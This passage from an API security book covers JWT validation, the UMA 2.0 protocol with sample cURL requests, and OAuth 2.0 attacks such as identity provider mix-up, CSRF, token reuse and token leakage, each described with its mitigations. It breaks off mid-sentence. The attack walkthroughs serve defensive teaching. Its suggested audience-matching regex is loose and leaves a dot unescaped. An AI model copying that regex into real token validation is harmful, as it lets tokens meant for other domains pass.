"alg": "RS256" "x5c": [ "MIIE3jCCA8agAwIBAgICAwEwDQYJKoZIhvcNAQEFBQ......", "MIIE3jewlJJMddds9AgICAwEwDQYJKoZIhvUjEcNAQ......", ] } { "sub": "3MVG9uudbyLbNPZN8rZTCj6IwpJpGBv49", "aud": "https://login.foo.com", "nbf": 1457330111, "iss": "bar.com", "exp": 1457330711, "iat": 1457330111, "jti": "44688e78-2d30-4e88-8b86-a6e25cd411fd" } The authorization server at the foo company first needs to verify the JWT with the attached public key (which is the value of the x5c parameter in the preceding code snippet) and then needs to check whether the corresponding public key is signed by the Chapter 12 Federating aCCess to apis 273 bar company’s certificate authority. If that is the case, then it’s a valid JWT and would successfully complete the client authentication. Also note that the value of the original client_id created for the bar company is set as the subject of the JWT. Still we have a challenge. How do we revoke a certificate that belongs to a given developer, in case he/she resigns or it is found that the certificate is misused? To facilitate this, the authorization server has to maintain a certificate revocation list (CRL) by the client_id. In other words, each client_id can maintain its own certificate revocation list. To revoke a certificate, the client (in this case, the bar company) has to talk to the CRL API hosted in the authorization server. The CRL API is a custom API that must be hosted at the OAuth authorization server to support this model. This API must be secured with OAuth 2.0 client credentials grant type. Once it receives a request to update the CRL, it will update the CRL corresponding to the client who invokes the API, and each time the client authentication happens, the authorization server must check the public certificate in the JWT against the CRL. If it finds a match, then the request should be turned down immediately. Also, at the time the CRL of a particular client is updated, all the access tokens and refresh tokens issued against a revoked public certificate must be revoked too. In case you worry about the overhead it takes to support a CRL, you probably can use short-lived certificates and forget about revocation. Figure 12-4 shows the interactions between the foo and the bar companies. Figure 12-4. JWT client authentication, a real-world example Chapter 12 Federating aCCess to apis 274 Parsing and Validating JWT The OAuth authorization server must parse and validate the JWT, both in the JWT grant type and in the client authentication. The following lists out the criteria for token validation: • The JWT must have the iss parameter in it. The iss parameter represents the issuer of the JWT. This is treated as a case-sensitive string value. Ideally, this represents the asserting party of the claims set. If Google issues the JWT, then the value of iss would be accounts.google.com. This is an indication to the receiving party who the issuer of the JWT is. • The JWT must have the sub parameter in it. The token issuer or the asserting party issues the JWT for a particular entity, and the claims set embedded into the JWT normally represents this entity, which is identified by the sub parameter. The value of the sub parameter is a case-sensitive string value. For the JWT client authentication, the value of the sub parameter must carry the corresponding client_id, while for the authorization grant, it will be the authorized accessor or the resource server for which the access token is being requested. • The JWT must have the aud parameter. The token issuer issues the JWT to an intended recipient or a list of recipients, which is represented by the aud parameter. The recipient or the recipient list should know how to parse the JWT and validate it. Prior to any validation check, the recipient of the token must first see whether the particular JWT is issued for its use and if not should reject immediately. The value of the aud parameter can be a case- sensitive string value or an array of strings. The token issuer should know, prior to issuing the token, who the intended recipient (or the recipients) of the token is, and the value of the aud parameter must be a pre-agreed value between the token issuer and the recipient. In practice, one can also use a regular expression to validate the audience of the token. For example, the value of the aud in the token can be ∗.apress.com, while each recipient under the apress.com domain can have its own aud values: foo.apress.com, bar.apress.com likewise. Chapter 12 Federating aCCess to apis 275 Instead of finding an exact match for the aud value, each recipient can just check whether the aud value in the token matches a regular expression: (?:[a-zA-Z0-9]∗|\∗).apress.com. This will make sure that any recipient can use a JWT, which is having any subdomain of apress.com. • The JWT must have the exp parameter. Each JWT will carry an expiration time. The recipient of the JWT token must reject it, if that token has expired. The issuer can decide the value of the expiration time. The JWT specification does not recommend or provide any guidelines on how to decide the best token expiration time. It’s a responsibility of the other specifications, which use JWT internally, to provide such recommendations. The value of the exp parameter is calculated by adding the expiration time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. If the token issuer’s clock is out of sync with the recipient’s clock (irrespective of their time zone), then the expiration time validation could fail. To fix that, each recipient can add a couple of minutes as the clock skew. • The JWT may have the nbf parameter. In other words, this is not a must. The recipient of the token should reject it, if the value of the nbf parameter is greater than the current time. The JWT is not good enough to use prior to the value indicated in the nbf parameter. The value of the nbf parameter is calculated by adding the not before time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. • The JWT may have the iat parameter. The iat parameter in the JWT indicates the issued time of the JWT as calculated by the token issuer. The value of the iat parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the current time, when the token is issued. • The JWT must be digitally signed or carry a Message Authentication Code (MAC) defined by its issuer. Chapter 12 Federating aCCess to apis 276 Summary • Identity federation is about propagating user identities across boundaries. These boundaries can be between distinct enterprises or even distinct identity management systems within the same enterprise. • Two OAuth 2.0 profiles—SAML 2.0 grant type and JWT grant type— focus on building federation scenarios for API security. • The SAML profile for OAuth 2.0, which is defined in the RFC 7522, extends the capabilities of the OAuth 2.0 core specification. It introduces a new authorization grant type as well as a way of authenticating OAuth 2.0 clients, based on a SAML assertion. • The JSON Web Token (JWT) profile for OAuth 2.0, which is defined in the RFC 7523, extends the capabilities of the OAuth 2.0 core specification. It introduces a new authorization grant type as well as a way of authenticating OAuth 2.0 clients, based on a JWT. Chapter 12 Federating aCCess to apis 277 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_13 CHAPTER 13 User-Managed Access OAuth 2.0 introduced an authorization framework for access delegation. It lets Bob delegate read access to his Facebook wall to a third-party application, without sharing Facebook credentials. User-Managed Access (UMA, pronounced “OOH-mah”) extends this model to another level, where Bob can not only delegate access to a third-party application but also to Peter who uses the same third-party application. UMA is an OAuth 2.0 profile. OAuth 2.0 decouples the resource server from the authorization server. UMA takes one step further: it lets you control a distributed set of resource servers from a centralized authorization server. Also the resource owner can define a set of policies at the authorization server, which can be evaluated at the time a client is granted access to a protected resource. This eliminates the need of having the presence of the resource owner to approve access requests from arbitrary clients or requesting parties. The authorization server can make the decision based on the policies defined by the resource owner. The latest version of UMA, which we discuss in this chapter, is UMA 2.0. If you are interested in learning more about UMA evolution, please check Appendix D: UMA Evolution. Use Cases Let’s say you have multiple bank accounts with Chase Bank, Bank of America, and Wells Fargo. You have hired a financial manager called Peter, who manages all your bank accounts through a personal financial management (PFM) application, which helps to budget better and understand the overall financial position, by often pulling information from multiple bank accounts. Here, you need to give limited access to Peter, to use the PFM to access your bank accounts. We assume all the banks expose their functionality over APIs and PFM uses banking APIs to retrieve data. 278 At a very high level, let’s see how UMA solves this problem (see Figure 13-1). First you need to define an access control policy at the authorization server, which all your banks trust. This authorization policy would say Peter should be given read access via the PFM app to Wells Fargo, Chase, and Bank of America bank accounts. Then you also need to introduce each bank to the authorization server, so whenever Peter tries to access your bank accounts, each bank talks to the authorization server and asks whether Peter is allowed to do that. For Peter to access a bank account via PFM app, the PFM app first needs to talk to the authorization server and gets a token on behalf of Peter. During this process, before issuing the token, the authorization server evaluates the access control policy you defined. Let’s take another example. Say you have a Google Doc. You do not want to share this with everyone, but with anyone from the management team of foo and bar companies (see Figure 13-2). Let’s see how this works with UMA. First you have an authorization server, which Google trusts, so whenever someone wants to access your Google Doc, Google talks to the authorization server to see whether that person has the rights to do so. You also define a policy at the authorization server, which says only the managers from foo and bar companies can access your Google Doc. Figure 13-1. An account owner delegates the administration of his/her accounts to a Financial Manager via a Personal Financial Management App Chapter 13 User-Managed aCCess 279 When a person (say Peter) tries to access your Google Doc, Google will redirect you to the authorization server. Then the authorization server will redirect Peter to Foo identity provider (or the home identity provider of Peter). Foo identity provider will authenticate Peter and send back Peter’s role as a claim to the authorization server. Now, since authorization server knows Peter’s role, and also the company Peter belongs to, if Peter belongs to a manager role, it will issue a token to Google Docs app, which it can use to retrieve the corresponding Google Doc via the Google Docs API. UMA 2.0 Roles UMA introduces one more role in addition to the four roles (resource owner, resource server, client, and authorization server) we discussed under OAuth 2.0, in Chapter 4. The following lists out all five roles involved in UMA: 1. Resource owner: In the preceding two use cases, you are the resource owner. In the first case, you owned the bank account, and in the second use case, you owned the Google Doc. 2. Resource server: This is the place which hosts protected resources. In the preceding first use case, each bank is a resource server— and in the second use case, the server, which hosts Google Docs API, is the resource server. Figure 13-2. A Google Doc owner delegates access to a Google Doc to a third party from a different company with specific roles Chapter 13 User-Managed aCCess 280 3. Client: This is the application, which wants to access a resource on behalf of the resource owner. In the preceding first use case, the personal financial management (PFM) application is the client, and in the second use case, it is the Google Docs web application. 4. Authorization server: This is the entity, which acts as the security token service (STS) to issue OAuth 2.0 access tokens to client applications. 5. Requesting party: This is something new in UMA. In the preceding first use case, Peter, the financial manager, is the requesting party, and in the second use case, Peter who is a manager at Foo company is the requesting party. The requesting party accesses a resource via a client application, on behalf of the resource owner. UMA Protocol There are two specifications developed under Kantara Initiative, which define UMA protocol. The core specification is called UMA 2.0 Grant for OAuth 2.0 Authorization. The other one is the Federated Authorization for UMA 2.0, which is optional. A grant type is an extension point in OAuth 2.0 architecture. UMA 2.0 grant type extends the OAuth 2.0 to support the requesting party role and defines the flow the client application should follow to obtain an access token on behalf of the requesting party from the authorization server. Let’s see in step by step how UMA 2.0 works, with the first use case we discussed earlier: 1. First, the account owner has to introduce each of his banks to the UMA authorization server. Here we possibly follow OAuth 2.0 authorization code grant type and provision an access token to the Chase Bank. UMA gives a special name to this token: Protection API Access Token (PAT). 2. The Chase Bank uses the provisioned access token or the PAT to register its resources with the authorization server. Following is a sample cURL command for resource registration. $PAT in the following command is a placeholder for the Protection API Access Chapter 13 User-Managed aCCess 281 Token. Here we register the account of the account owner as a resource. \> curl -v -X POST -H "Authorization:Bearer $PAT" -H "Content-Type: application/json" -d '{"resource_ scopes":["view"], "description":"bank account details", "name":"accounts/1112019209", "type":"/accounts"}' https://as.uma.example.com/uma/resourceregistration 3. Peter via the personal financial management (PFM) application tries to access the Chase Bank account with no token. \> curl –X GET https://chase.com/apis/accounts/1112019209 4. Since there is no token in the request from PFM, the bank API responds back with a 401 HTTP error code, along with the endpoint of the authorization server and a permission ticket. This permission ticket represents the level of permissions PFM needs to do a GET to /accounts API of the Chase Bank. In other words, PFM should get an access token from the provided authorization server, with the provided permissions in the given permission ticket. 5. To generate the permission ticket, the Chase Bank has to talk to the authorization server. As per the following cURL command, Chase Bank also passes resource_id and the resource_scope. The permission API is protected via OAuth 2.0, so the Chase Bank has to pass a valid access token to access it. UMA gives a special name to this token: Protection API Access Token (PAT), which we provisioned to Chase Bank in step 1. \> curl -v -X POST -H "Authorization:Bearer $PAT" -H "Content-Type: application/json" -d '[{"resource_id":" accounts/1112019209","resource_scopes":["view"]}]' https://as.uma.example.com/uma/permission {"ticket":"1qw32s-2q1e2s-1rt32g-r4wf2e"} Chapter 13 User-Managed aCCess 282 6. Now the Chase Bank will send the following 401 response to the PFM application. HTTP/1.1 401 Unauthorized WWW-Authenticate: UMA realm="chase" as_uri="https://as.uma. example.com" ticket="1qw32s-2q1e2s-1rt32g-r4wf2e " 7. The client application or the PFM now has to talk to the authorization server. By this time, we can assume that Peter, or the requesting party, has already logged in to the client app. If that login happens over OpenID Connect, then PFM has an ID token, which represents Peter. PFM passes both the ID token (as claim_ token) and the permission ticket (as ticket) it got from Chase Bank to the authorization server, in the following cURL command. The claim_token is an optional parameter in the request, and if it is present, then there must be claim_token_format parameter as well, which defines the format of the claim_token. In the following cURL command, use a claim_token of the ID token format, and it can be even a SAML token. Here the $APP_CLIENTID and $APP_CLIENTSECRET are the OAuth 2.0 client id and client secret, respectively, you get at the time you register your application (PFM) with the OAuth 2.0 authorization server. The $IDTOKEN is a placeholder for the OpenID Connect ID token, while $TICKET is a placeholder for the permission ticket. The value of the grant_type parameter must be set to urn:ietf:params:oauth:grant- type:uma-ticket. The following cURL command is only an example, and it does not carry all the optional parameters. \> curl -v -X POST --basic -u $APP_CLIENTID:$APP_ CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -k -d "grant_type=urn:ietf:params:oauth:grant-type:uma-ticket& claim_token=$IDTOKEN& Chapter 13 User-Managed aCCess 283 claim_token_format=http://openid.net/specs/openid- connect-core-1_0.html#IDToken& ticket=$TICKET" https://as.uma.example.com/uma/token 8. As the response to the preceding request, the client application gets an access token, which UMA calls a requesting party token (RPT), and before authorization server returns back the access token, it internally evaluates any authorization policies defined by the account owner (or the resource owner) to see whether Peter has access to the corresponding bank account. { "token_type":"bearer", "expires_in":3600, "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } 9. Now the application (PFM) tries to access the Chase Bank account with the RPT from the preceding step. \> curl –X GET –H "Authorization: Bearer cac93e1d29e45bf6d84073dbfb460" https://chase.com/apis/ accounts/1112019209 10. The Chase Bank API will now talk to the introspection (see Chapter 9) endpoint to validate the provided RPT and, if the token is valid, will respond back with the corresponding data. If the introspection endpoint is secured, then the Chase Bank API has to pass the PAT in the HTTP authorization header to authenticate. \> curl -H "Authorization:Bearer $PAT" -H 'Content-Type: application/x-www-form-urlencoded' -X POST --data "token= cac93e1d29e45bf6d84073dbfb460" https://as.uma.example.com/ uma/introspection HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Chapter 13 User-Managed aCCess 284 { "active": true, "client_id":"s6BhdRkqt3", "scope": "view", "sub": "peter", "aud": "accounts/1112019209" } 11. Once the Chase Bank finds the token is valid and carries all required scopes, it will respond back to the client application (PFM) with the requested data. Note a recording of a UMa 2.0 demo done by the author of the book to the UMa working group with the open source WsO2 Identity server is available here: www.youtube.com/watch?v=66aGc5AV7P4. Interactive Claims Gathering In the previous section, in step 7, we assumed that the requesting party is already logged in to the client application and the client application knows about the requesting party’s claims, say, for example, in the format of an ID token or a SAML token. The client application passes these claims in the claim_token parameter along with the permission ticket to the token endpoint of the authorization server. This request from the client application to the authorization server is a direct request. In case the client application finds that it does not have enough claims that are required by the authorization server to make an authorization decision based on its policies, the client application can decide to use interactive claim gathering. During the interactive claim gathering, the client application redirects the requesting party to the UMA authorization server. This is what we discussed under the second use case at the very beginning of the chapter, with respect to sharing Google Docs with external companies. The following is a sample request the client application generates to redirect the requesting party to the authorization server. Chapter 13 User-Managed aCCess 285 Host: as.uma.example.com GET /uma/rqp_claims?client_id=$APP_CLIENTID &ticket=$TICKET &claims_redirect_uri=https://client.example.com/redirect_claims &state=abc The preceding sample request is an HTTP redirect, which flows through the browser. Here the $APP_CLIENTID is the OAuth 2.0 client id you get at the time you register your application with the UMA authorization server, and $TICKET is a placeholder for the permission ticket the client application gets from the resource server (see step 6 in the previous section). The value of claim_redirect_uri indicates the authorization server, where to send the response back, which points to an endpoint hosted in the client application. How the authorization server does claim gathering is out of the scope of the UMA specification. Ideally, it can be by redirecting the requesting party again to his/her own home identity provider and getting back the requested claims (see Figure 13-2). Once the claim gathering is completed, the authorization server redirects the user back to the claim_redirect_uri endpoint with a permission ticket, as shown in the following. The authorization server tracks all the claims it gathered against this permission ticket. HTTP/1.1 302 Found Location: https://client.example.com/redirect_claims? ticket=cHJpdmFjeSBpcyBjb250ZXh0LCBjb250cm9s&state=abc The client application will now talk to the token endpoint of the authorization server with the preceding permission ticket to get a requesting party token (RPT). This is similar to what we discussed under step 7 in the previous section, but here we do not send a claim_token. \> curl -v -X POST --basic -u $APP_CLIENTID:$APP_CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -k -d "grant_type=urn:ietf:params:oauth:grant-type:uma-ticket& ticket=$TICKET" https://as.uma.example.com/uma/token As the response to the preceding request, the client application gets an access token, which UMA calls a requesting party token (RPT), and before authorization server Chapter 13 User-Managed aCCess 286 returns back the access token, it internally evaluates any authorization policies defined by the account owner (or the resource owner) to see whether Peter has access to the corresponding bank account. { "token_type":"bearer", "expires_in":3600, "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } Summary • User-Managed Access (UMA) is an emerging standard built on top of the OAuth 2.0 core specification as a profile. • UMA still has very few vendor implementations, but it promises to be a highly recognized standard in the near future. • There are two specifications developed under Kantara Initiative, which define the UMA protocol. The core specification is called the UMA 2.0 Grant for OAuth 2.0 Authorization. The other one is the Federated Authorization for UMA 2.0, which is optional. • UMA introduces a new role called, requesting party, in addition to the four roles used in OAuth 2.0: the authorization server, the resource server, the resource owner and the client application. Chapter 13 User-Managed aCCess 287 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_14 CHAPTER 14 OAuth 2.0 Security OAuth 2.0 is an authorization framework, as you know already. Being a framework, it gives multiple options for application developers. It is up to the application developers to pick the right options based on their use cases and how they want to use OAuth 2.0. There are few guideline documents to help you use OAuth 2.0 in a secure way. OAuth 2.0 Threat Model and Security Considerations (RFC 6819) produced by OAuth IETF working group defines additional security considerations for OAuth 2.0, beyond those in the OAuth 2.0 specification, based on a comprehensive threat model. The OAuth 2.0 Security Best Current Practice document, which is a draft proposal at the time of writing, talks about new threats related to OAuth 2.0, since the RFC 6819 was published. Also, the Financial-grade API (FAPI) working group under the OpenID foundation has published a set of guidelines on how to use OAuth 2.0 in a secure way to build financial grade applications. In this chapter, we go through a set of possible attacks against OAuth 2.0 and discuss how to mitigate those. Identity Provider Mix-Up Even though OAuth 2.0 is about access delegation, still people work around it to make it work for login. That’s how login with Facebook works. Then again, the OpenID Connect (see Chapter 6), which is built on top of OAuth 2.0, is the right way of using OAuth 2.0 for authentication. A recent research done by one of the leading vendors in the Identity and Access Management domain confirmed that most of the new development happened over the past few years at the enterprise level picked OAuth 2.0/OpenID Connect over SAML 2.0. All in all, OAuth 2.0 security is a hot topic. In 2016, Daniel Fett, Ralf Küsters, and Guido Schmitz did a research on OAuth 2.0 security and published a paper.1 Identity provider mix-up is one of the attacks highlighted in their paper. Identity provider is in 1 A Comprehensive Formal Security Analysis of OAuth 2.0, https://arxiv.org/pdf/1601.01229.pdf 288 fact the entity that issues OAuth 2.0 tokens or the OAuth 2.0 authorization server, which we discussed in Chapter 4. Let’s try to understand how identity provider mix-up works (see Figure 14-1): 1. This attack happens with an OAuth 2.0 client application, which provides multiple identity provider (IdP) options for login. Let’s say foo.idp and evil.idp. We assume that the client application does not know that evil.idp is evil. Also it can be a case where evil. idp is a genuine identity provider, which could possibly be under an attack itself. 2. The victim picks foo.idp from the browser and the attacker intercepts the request and changes the selection to evil.idp. Here we assume the communication between the browser and the client application is not protected with Transport Layer Security (TLS). The OAuth 2.0 specification does not talk about it, and it’s purely up to the web application developers. Since there is no confidential data passed in this flow, most of the time the web application developers may not worry about using TLS. At the same time, there were few vulnerabilities discovered over the past on TLS implementations (mostly openssl). So, the attacker could possibly use such vulnerabilities to intercept the communication between the browser and the client application (web server), even if TLS is used. Chapter 14 Oauth 2.0 SeCurity 289 3. Since the attacker changed the identity provider selection of the user, the client application thinks it’s evil.idp (even though the user picked foo.idp) and redirects the user to evil.idp. The client application only gets the modified request from the attacker, who intercepted the communication. 4. The attacker intercepts the redirection and modifies the redirection to go to the foo.idp. The way redirection works is the web server (in this case, the client application) sends back a response to the browser with a 302 status code—and with an HTTP Location header. If the communication between the browser and the client application is not on TLS, then this response is not protected, even if the HTTP Location header contains an HTTPS URL. Since we assumed already, the communication between the browser and the client application can be intercepted by the attacker, then the attacker can modify the Location header in the response to go to the foo.idp—which is the original selection—and no surprise to the user. Figure 14-1. Identity provider mix-up attack Chapter 14 Oauth 2.0 SeCurity 290 5. The client application gets either the code or the token (based on the grant type) and now will talk to the evil.idp to validate it. The authorization server (or the identity provider) will send back the authorization code (if the code grant type is used) to the callback URL, which is under the client application. Just looking at the authorization code, the client application cannot decide to which identity provider the code belongs to. So we assume it tracks the identity provider by some session variable—so as per step 3, the client application thinks it’s the evil.idp and talks to the evil.idp to validate the token. 6. The evil.idp gets hold of the user’s access token or the authorization code from the foo.idp. If it’s the implicit grant type, then it would be the access token, otherwise the authorization code. In mobile apps, most of the time, people used to embed the same client id and the client secret into all the instances—so an attacker having root access to his own phone can figure it out what the keys are and then, with the authorization code, can get the access token. There is no record that the preceding attack is being carried out in practice—but at the same time, we cannot totally rule it out. There are a couple of options to prevent such attacks, and our recommendation is to use the option 1 as it is quite straightforward and solves the problem without much hassle. 1. Have separate callback URLs by each identity provider. With this the client application knows to which identity provider the response belongs to. The legitimate identity provider will always respect the callback URL associated with the client application and will use that. The client application will also attach the value of the callback URL to the browser session and, once the user got redirected back, will see whether it’s on the right place (or the right callback URL) by matching with the value of the callback URL from the browser session. 2. Follow the mitigation steps defined in the IETF draft specification: OAuth 2.0 IdP Mix-Up Mitigation (https://tools.ietf. org/html/draft-ietf-oauth-mix-up-mitigation-01). This specification proposes to send a set of mitigation data from Chapter 14 Oauth 2.0 SeCurity 291 the authorization server back to the client, along with the authorization response. The mitigation data provided by the authorization server to the client includes an issuer identifier, which is used to identify the authorization server, and a client id, which is used to verify that the response is from the correct authorization server and is intended for the given client. This way the OAuth 2.0 client can verify from which authorization server it got the response back and based on that identify the token endpoint or the endpoint to validate the token. Cross-Site Request Forgery (CSRF) In general, Cross-Site Request Forgery (CSRF) attack forces a logged-in victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests, where the vulnerable application thinks are legitimate requests from the victim. OWASP (Open Web Application Security Project) identifies this as one of the key security risks in web applications in its 2017 report.2 Let’s see how CSRF can be used with OAuth 2.0 to exploit a vulnerable web application (see Figure 14-2): 1. The attacker tries to log in to the target web site (OAuth 2.0 client) with his account at the corresponding identity provider. Here we assume the attacker has a valid account at the identity provider, trusted by the corresponding OAuth 2.0 client application. 2. The attacker blocks the redirection to the target web site and captures the authorization code. The target web site never sees the code. In OAuth 2.0, the authorization code is only good enough for one-time use. In case the OAuth 2.0 client application sees it and then exchanges it to an access token, then it’s no more valid—so the attacker has to make sure that the authorization code never reaches the client application. Since the authorization code flows through the attacker’s browser to the client, it can be easily blocked. 2 OWASP Top 10 2017, www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf Chapter 14 Oauth 2.0 SeCurity 292 3. The attacker constructs the callback URL for the target site—and makes the victim clicks on it. In fact, it would be the same callback URL the attacker can copy from step 2. Here the attacker can send the link to the victim’s email or somehow fool him to click on the link. 4. The victim clicks on the link and logs in to the target web site, with the account attached to the attacker—and adds his/her credit card information. Since the authorization code belongs to the attacker, the victim logs in to the target web site with the attacker’s account. This is a pattern many web sites follow to authenticate users with OAuth 2.0. Login with Facebook works in the same way. Once the web site gets the authorization code, it will talk to the authorization server and exchanges it to an access token. Then using that access token, the web site talks to another endpoint in the authorization server to find user information. In this case, since the code belongs to the attacker, the user information returned back from the authorization server will be related to Figure 14-2. Cross-Site Request Forgery (CSRF) attack in the OAuth 2.0 code flow Chapter 14 Oauth 2.0 SeCurity 293 him—so the victim now logs in to the target web site with the attacker’s account. 5. The attacker too logs in to the target web site with his/her valid credentials and uses victim’s credit card to purchase goods. The preceding attack can be mitigated by following these best practices: • Use a short-lived authorization code. Making the authorization code expires soon gives very little time for the attacker to plant an attack. For example, the authorization code issued by LinkedIn expires in 30 seconds. Ideally, the lifetime of the authorization code should be in seconds. • Use the state parameter as defined in the OAuth 2.0 specification. This is one of the key parameters to use to mitigate CSRF attacks in general. The client application has to generate a random number (or a string) and passes it to the authorization server along with the grant request. Further, the client application has to add the generated value of the state to the current user session (browser session) before redirecting the user to the authorization server. According to the OAuth 2.0 specification, the authorization server has to return back the same state value with the authorization code to the redirect_uri (to the client application). The client must validate the state value returned from the authorization server with the value stored in the user’s current session—if it mismatches, it rejects moving forward. Going back to the attack, when the user clicks the crafted link sent to the victim by the attacker, it won’t carry the same state value generated before and attached to the victim’s session (or most probably victim’s session has no state value), or the attacker does not know how to generate the exact same state value. So, the attack won’t be successful, and the client application will reject the request. • Use PKCE (Proof Key for Code Exchange). PKCE (RFC 7636) was introduced to protect OAuth 2.0 client applications from the authorization code interception attack, mostly targeting native mobile apps. The use of PKCE will also protect users from CSRF attacks, once the code_verifier is attached to the user’s browser session. We talked about PKCE in detail in Chapter 10. Chapter 14 Oauth 2.0 SeCurity 294 Token Reuse OAuth 2.0 tokens are issued by the authorization server to a client application to access a resource on behalf of the resource owner. This token is to be used by the client—and the resource server will make sure it’s a valid one. What if the resource server is under the control of an attacker and wants to reuse the token sent to it to access another resource, impersonating the original client? Here the basic assumption is there are multiple resource servers, which trust the same authorization server. For example, in a microservices deployment, there can be multiple microservices protected with OAuth 2.0, which trust the same authorization server. How do we make sure at the resource server side that the provided token is only good enough to access it? One approach is to have properly scoped access tokens. The scopes are defined by the resource server—and update the authorization server. If we qualify each scope with a Uniform Resource Name (URN) specific to the corresponding resource server, then there cannot be any overlapping scopes across all the resource servers—and each resource server knows how to uniquely identify a scope corresponding to it. Before accepting a token, it should check whether the token is issued with a scope known to it. This does not completely solve the problem. If the client decides to get a single access token (with all the scopes) to access all the resources, then still a malicious client can use that access token to access another resource by impersonating the original client. To overcome this, the client can first get an access token with all the scopes, then it can exchange the access token to get multiple access tokens with different scopes, following the OAuth 2.0 Token Exchange specification (which we discussed in Chapter 9). A given resource server will only see an access token having scopes only related to that particular resource server. Let’s see another example of token reuse. Here assume that you log in to an OAuth 2.0 client application with Facebook. Now the client has an access token, which is good enough to access the user info endpoint (https://graph.facebook.com/me) of Facebook and find who the user is. This client application is under an attacker, and now the attacker tries to access another client application, which uses the implicit grant type, with the same access token, as shown in the following. https://target-app/callback?access_token=<access_token> Chapter 14 Oauth 2.0 SeCurity 295 The preceding URL will let the attacker log in to the client application as the original user unless the target client application has proper security checks in place. How do we overcome this? There are multiple options: • Avoid using OAuth 2.0 for authentication—instead use OpenID Connect. The ID token issued by the authorization server (via OpenID Connect) has an element called aud (audience)—and its value is the client id corresponding to the client application. Each application should make sure that the value of the aud is known to it before accepting the user. If the attacker tries to replay the ID token, it will not work since the audience validation will fail at the second client application (as the second application expects a different aud value). • Facebook login is not using OpenID Connect—and the preceding attack can be carried out against a Facebook application which does not have the proper implementation. There are few options introduced by Facebook to overcome the preceding threat. One way is to use the undocumented API, https://graph.facebook.com/ app?access_token=<access_token>, to get access token metadata. This will return back in a JSON message the details of the application which the corresponding access token is issued to. If it’s not yours, reject the request. • Use the standard token introspection endpoint of the authorization server to find the token metadata. The response will have the client_ id corresponding to the OAuth 2.0 application—and if it does not belong to you, reject the login request. There is another flavor of token reuse—rather we call it token misuse. When implicit grant type is used with a single-page application (SPA), the access token is visible to the end user—as it’s on the browser. It’s the legitimate user—so the user seeing the access token is no big deal. But the issue is the user would probably take the access token out of the browser (or the app) and automate or script some API calls, which would generate more load on the server that would not expect in a normal scenario. Also, there is a cost Chapter 14 Oauth 2.0 SeCurity 296 of making API calls. Most of the client applications are given a throttle limit—meaning a given application can only do n number of calls during a minute or some fixed time period. If one user tries to invoke APIs with a script, that could possibly eat out the complete throttle limit of the application—making an undesirable impact on the other users of the same application. To overcome such scenarios, the recommended approach is to introduce throttle limits by user by application—not just by the application. In that way, if a user wants to eat out his own throttle limit, go out and do it! The other solution is to use Token Binding, which we discussed in Chapter 11. With token binding, the access token is bound to the underlying Transport Layer Security (TLS) connection, and the user won’t be able to export it and use it from somewhere else. Token Leakage/Export More than 90% of the OAuth 2.0 deployments are based on bearer tokens—not just the public/Internet scale ones but also at the enterprise level. The use of a bearer token is just like using cash. When you buy a cup of coffee from Starbucks, paying by cash, no one will bother how you got that ten-dollar note—or if you’re the real owner of it. OAuth 2.0 bearer tokens are similar to that. If someone takes the token out of the wire (just like stealing a ten-dollar note from your pocket), he/she can use it just as the original owner of it—no questions asked! Whenever you use OAuth 2.0, it’s not just recommended but a must to use TLS. Even though TLS is used, still a man-in-the-middle attack can be carried out with various techniques. Most of the time, the vulnerabilities in TLS implementations are used to intercept the TLS-protected communication channels. The Logjam attack discovered in May 2015 allowed a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allowed the attacker to read and modify any data passed over the connection. There are few things we need to worry about as precautions to keep the attacker away from having access to the tokens: • Always be on TLS (use TLS 1.2 or later). • Address all the TLS-level vulnerabilities at the client, authorization server, and the resource server. Chapter 14 Oauth 2.0 SeCurity 297 • The token value should be >=128 bits long and constructed from a cryptographically strong random or pseudorandom number sequence. • Never store tokens in cleartext—but the salted hash. • Never write access/refresh tokens into logs. • Use TLS tunneling over TLS bridging. • Decide the lifetime of each token based on the risk associated with token leakage, duration of the underlying access grant (SAML grant (RFC 7522) or JWT grant (RFC 7523)), and the time required for an attacker to guess or produce a valid token. • Prevent reuse of the authorization code—just once. • Use one-time access tokens. Under the OAuth 2.0 implicit grant type, access token comes as a URI fragment—which will be in the browser history. In such cases, it can be immediately invalidated by exchanging it to a new access token from the client application (which is an SPA). • Use strong client credentials. Most of the applications just use client id and client secret to authenticate the client application to the authorization server. Rather than passing credentials over the wire, client can use either the SAML or JWT assertion to authenticate. In addition to the preceding measures, we can also cryptographically bind the OAuth 2.0 access/refresh tokens and authorization codes to a given TLS channel—so those cannot be exported and used elsewhere. There are few specifications developed under the IETF Token Binding working group to address this aspect. The Token Binding Protocol, which we discussed in Chapter 11, allows client/server applications to create long-lived, uniquely identifiable TLS bindings spanning multiple TLS sessions and connections. Applications are then enabled to cryptographically bind security tokens to the TLS layer, preventing token export and replay attacks. To protect privacy, the Token Binding identifiers are only conveyed over TLS and can be reset by the user at any time. Chapter 14 Oauth 2.0 SeCurity 298 The OAuth 2.0 Token Binding specification (which we discussed in Chapter 11) defines how to apply Token Binding to access tokens, authorization codes, and refresh tokens. This cryptographically binds OAuth tokens to a client’s Token Binding key pair, the possession of which is proven on the TLS connections over which the tokens are intended to be used. The use of Token Binding protects OAuth tokens from man-in-the- middle, token export, and replay attacks. Open Redirector An open redirector is an endpoint hosted on the resource server (or the OAuth 2.0 client application) end, which accepts a URL as a query parameter in a request—and then redirects the user to that URL. An attacker can modify the redirect_uri in the authorization grant request from the resource server to the authorization server to include an open redirector URL pointing to an endpoint owned by him. To do this, the attacker has to 